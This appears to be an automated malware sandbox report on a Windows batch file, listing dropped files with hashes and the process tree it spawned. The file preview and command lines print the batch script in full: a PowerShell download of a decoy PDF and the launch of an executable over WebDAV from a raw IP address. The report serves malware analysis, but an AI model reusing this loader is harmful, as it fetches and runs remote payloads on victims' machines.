                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                  Category:dropped
                  Size (bytes):144514
                  Entropy (8bit):7.992637131260696
                  Encrypted:true
                  SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                  MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                  SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                  SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                  SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                  Malicious:false
                  Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:ASCII text, with very long lines (393)
                  Category:dropped
                  Size (bytes):16525
                  Entropy (8bit):5.345946398610936
                  Encrypted:false
                  SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                  MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                  SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                  SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                  SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                  Malicious:false
                  Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:ASCII text, with very long lines (393), with CRLF line terminators
                  Category:dropped
                  Size (bytes):15114
                  Entropy (8bit):5.314151902684421
                  Encrypted:false
                  SSDEEP:384:goSCh7cF5kKS1BgELUlIMub6OBgJOQgoHYXRbzxoHpo5IXnVG8SttQtA1LBOZ+Ia:y1g
                  MD5:3A049B50F7B65FC28EBF42644FB74774
                  SHA1:35D006E2A1858C36A796939C2C7721FAD67D108E
                  SHA-256:647CC183179F7DA3DBE38C43AD261FE3E57DD0CBD7C2F8158C10569B1083A353
                  SHA-512:6C7D78DD86B9471C8FEFADE39546EEC4192C6C0F7E151D57F9C0A09544192780AA740882C2CBA983A6050A7AD10DFAC3CF3DB7B54448B4A152A1AAD883ADB85D
                  Malicious:false
                  Preview:SessionID=e112f80a-0911-42a6-b17a-ba78a5b440a0.1736001484944 Timestamp=2025-01-04T09:38:04:944-0500 ThreadID=1368 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=e112f80a-0911-42a6-b17a-ba78a5b440a0.1736001484944 Timestamp=2025-01-04T09:38:04:947-0500 ThreadID=1368 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=e112f80a-0911-42a6-b17a-ba78a5b440a0.1736001484944 Timestamp=2025-01-04T09:38:04:947-0500 ThreadID=1368 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=e112f80a-0911-42a6-b17a-ba78a5b440a0.1736001484944 Timestamp=2025-01-04T09:38:04:948-0500 ThreadID=1368 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=e112f80a-0911-42a6-b17a-ba78a5b440a0.1736001484944 Timestamp=2025-01-04T09:38:04:948-0500 ThreadID=1368 Component=ngl-lib_NglAppLib Description="SetConf
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):29752
                  Entropy (8bit):5.389564836924319
                  Encrypted:false
                  SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rs:I
                  MD5:8B755CD00F1BBE6B8EC1B3F8E4A50F8A
                  SHA1:A7964F6B6CC7F4BC7360FCF1BFF97909C94BFF0D
                  SHA-256:621B8C2EC5461FCA435D288EB4B578D403BB2A83BBF5BB771133078BA61636A1
                  SHA-512:1E5F287FD242DC9ABEA57C7A74B733DB6C621C3B83309A9C93BEBD2356870A8ACEB28A8465B4BA9CED12071D33082F402AD0480590A2D4BDCF7AFF376C1844A8
                  Malicious:false
                  Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                  Category:dropped
                  Size (bytes):1419751
                  Entropy (8bit):7.976496077007677
                  Encrypted:false
                  SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                  MD5:95F182500FC92778102336D2D5AADCC8
                  SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                  SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                  SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                  Malicious:false
                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                  Category:dropped
                  Size (bytes):386528
                  Entropy (8bit):7.9736851559892425
                  Encrypted:false
                  SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                  MD5:5C48B0AD2FEF800949466AE872E1F1E2
                  SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                  SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                  SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                  Malicious:false
                  Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                  Category:dropped
                  Size (bytes):758601
                  Entropy (8bit):7.98639316555857
                  Encrypted:false
                  SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                  MD5:3A49135134665364308390AC398006F1
                  SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                  SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                  SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                  Malicious:false
                  Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
                  Category:dropped
                  Size (bytes):1407294
                  Entropy (8bit):7.97605879016224
                  Encrypted:false
                  SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WeGZflwYIGNPB4:JVB3mlind9i4ufFXpAXkrfUs0jWeGZda
                  MD5:52A31226BDEA5E04D07595D78CD7779F
                  SHA1:88BDAE6EA2B2AAECEA3D8DDAA191CD77D25DC07B
                  SHA-256:1A7112B0F3E6C8949F0FC5E451F932EE20CAC6CB592D361789E0D838378BD804
                  SHA-512:3835415CC249AFE6BBED5596EAFB9FDAD7B81DADB43B380645578D8561855C0C2294D8D4CAA378C038C4A5A47B2C89493BB218194542776F0BDA6B5A44B04082
                  Malicious:false
                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):98682
                  Entropy (8bit):6.445287254681573
                  Encrypted:false
                  SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                  MD5:7113425405A05E110DC458BBF93F608A
                  SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                  SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                  SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                  Malicious:false
                  Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):737
                  Entropy (8bit):7.501268097735403
                  Encrypted:false
                  SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                  MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                  SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                  SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                  SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                  Malicious:false
                  Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:PDF document, version 1.3, 1 pages
                  Category:dropped
                  Size (bytes):376638
                  Entropy (8bit):7.9599035996479675
                  Encrypted:false
                  SSDEEP:6144:RtJVcfLEAaFh4w1q+lW0IQjjVlywoUJpAaBwSqDkVo4xX/8oNWSE:VVcfWow1KEvT3lBwSew/d8D
                  MD5:438EDF9D98AF97CA12C823FF4E330424
                  SHA1:422D359469158CA7571D7CAEB2947E488AD86C1C
                  SHA-256:FDE79649600B4D08723FB5D80C78D302E1573C8445B3313E2B79F8F1ECACEE50
                  SHA-512:08DD93C3B3E54BB73A44EAC425AC64DD447CB674F2C15C0539BE84D1F57EC753976E369A2D954F931C0EA2E7CEC9C88F53842AE5C6FAFF47A7366C7AA57EABB0
                  Malicious:false
                  Preview:%PDF-1.3.%......7 0 obj <</Linearized 1/L 376638/O 9/E 344821/N 1/T 376457/H [ 2396 367]>>.endobj. .xref.7 105.0000000016 00000 n..0000002763 00000 n..0000002822 00000 n..0000003559 00000 n..0000003740 00000 n..0000003917 00000 n..0000005804 00000 n..0000007581 00000 n..0000007716 00000 n..0000007852 00000 n..0000007989 00000 n..0000008122 00000 n..0000008254 00000 n..0000009916 00000 n..0000010051 00000 n..0000010188 00000 n..0000010322 00000 n..0000011612 00000 n..0000013073 00000 n..0000013215 00000 n..0000014330 00000 n..0000014455 00000 n..0000015637 00000 n..0000017046 00000 n..0000017589 00000 n..0000017784 00000 n..0000017852 00000 n..0000017994 00000 n..0000018018 00000 n..0000018313 00000 n..0000020937 00000 n..0000021133 00000 n..0000021201 00000 n..0000021470 00000 n..0000021494 00000 n..0000021902 00000 n..0000027398 00000 n..0000027596 00000 n..0000027664 00000 n..0000028041 00000 n..0000028065 00000 n..0000028604 00000 n..0000032856 00000 n..0000033056 00
                  Process:C:\Windows\System32\svchost.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):55
                  Entropy (8bit):4.306461250274409
                  Encrypted:false
                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                  Malicious:false
                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                  File type:DOS batch file, ASCII text, with CRLF line terminators
                  Entropy (8bit):5.312291074258258
                  TrID:
                    File name:sHCznAai4a.bat
                    File size:252 bytes
                    MD5:b91d2640c2972bbbe94014406a07695a
                    SHA1:af9c7f23facca63c6ce39ff9dfeb5f495fd9abd4
                    SHA256:3ded7af0f272b3d1adb6372e1729cfb6a2b77f548b17b8d80c451fe42dfdf57d
                    SHA512:8b99acfeb60b9ef8bbb08497fdab54720952015c657f37d565ff2f1a93242749b3da948573080ff972bfcf26b699d13dbac9770e65ecf26f85743ab2b0285ed1
                    SSDEEP:6:hCxVDGGIOyYn7G8GSLh8uWfkW/txiVWWJOENRbv:AVyk7G8pGuYn/OojENRbv
                    TLSH:78D0A73F650C2B258EDD6BB1503D63D0FC02E55D5C457DD9528819A97A0FB50BD5062C
                    File Content Preview:@echo off..if not "%1" == "min" start /MIN cmd /c %0 min & exit/b >nul 2>&1..powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf"..start u43g9t.pdf..start \\54.39.248.66@5000\DavWWWRoot\Statement_Of_Account.exe
                    Icon Hash:9686878b929a9886
                    No network behavior found

                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:09:37:56
                    Start date:04/01/2025
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\sHCznAai4a.bat" "
                    Imagebase:0x7ff600970000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:1
                    Start time:09:37:56
                    Start date:04/01/2025
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:09:37:56
                    Start date:04/01/2025
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd /c "C:\Users\user\Desktop\sHCznAai4a.bat" min
                    Imagebase:0x7ff600970000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:3
                    Start time:09:37:56
                    Start date:04/01/2025
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:4
                    Start time:09:37:56
                    Start date:04/01/2025
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf"
                    Imagebase:0x7ff788560000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:09:38:00
                    Start date:04/01/2025
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\u43g9t.pdf"
                    Imagebase:0x7ff6bc1b0000
                    File size:5'641'176 bytes
                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:6
                    Start time:09:38:02
                    Start date:04/01/2025
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                    Imagebase:0x7ff74bb60000
                    File size:3'581'912 bytes
                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:7
                    Start time:09:38:02
                    Start date:04/01/2025
                    Path:C:\Windows\System32\svchost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Imagebase:0x7ff6eef20000
                    File size:55'320 bytes
                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:8
                    Start time:09:38:02
                    Start date:04/01/2025
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1620,i,284349947158003395,7923369170220730022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                    Imagebase:0x7ff74bb60000
                    File size:3'581'912 bytes
                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    No disassembly